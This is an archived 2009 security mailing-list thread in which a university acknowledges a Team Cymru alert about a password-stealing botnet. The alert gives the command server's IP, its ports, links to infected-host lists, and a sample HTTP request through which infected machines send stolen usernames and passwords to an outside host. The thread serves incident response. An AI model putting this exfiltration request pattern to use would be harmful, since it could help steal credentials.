[nsp-sec] ACK RE: 130K+ Infected Ips on ~3600 ASNs

Greenberg, David A dgreenbe at iu.edu
Thu Oct 1 15:53:44 EDT 2009 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ACK AS 87 Indiana University

The first one on our list is a linux machine doing some sort of malware research.  The rest are all likely compromised computers.

David

- -----Original Message-----
From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Thursday, October 01, 2009 1:48 PM
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs

- ----------- nsp-security Confidential --------

Hi Team,

This password stealer head end IP appears to be quite busy:

76.73.37.250

We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected Ips seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012.  I don't anticipate an IP
takedown to last forver because they can likely re-route via DNS.

    ASN list:
    https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt

    Infected IP list:
    https://www.cymru.com/nsp-sec/Owned/stealer/
    eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt

Timestamps in UTC.

Some clarification on the formatting:

3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
Massachusetts Institute of Technology

The timestamp column will begin with a U or a T.  U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.

It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases.  I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious.  Here is a
public URL for reference:

    http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html

As there is UDP involved we cannot guarantee that there are 0 spoofed Ips,
but on the TCP side that is another matter.

HTTP credential stealing looks something like this:

GET
/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.


Cheers,
- -- steve

- --
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com




_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 9.10.0 (Build 500)
Charset: utf-8

wj8DBQFKxQjIv9fiDogoQQIRAoFKAJoCnhRkRXRRT/F8Y8m1WjblzIQKGACgzCnq
3EMU5zojmseu92oU3buHM58=
=a+Ny
-----END PGP SIGNATURE-----

More information about the nsp-security mailing list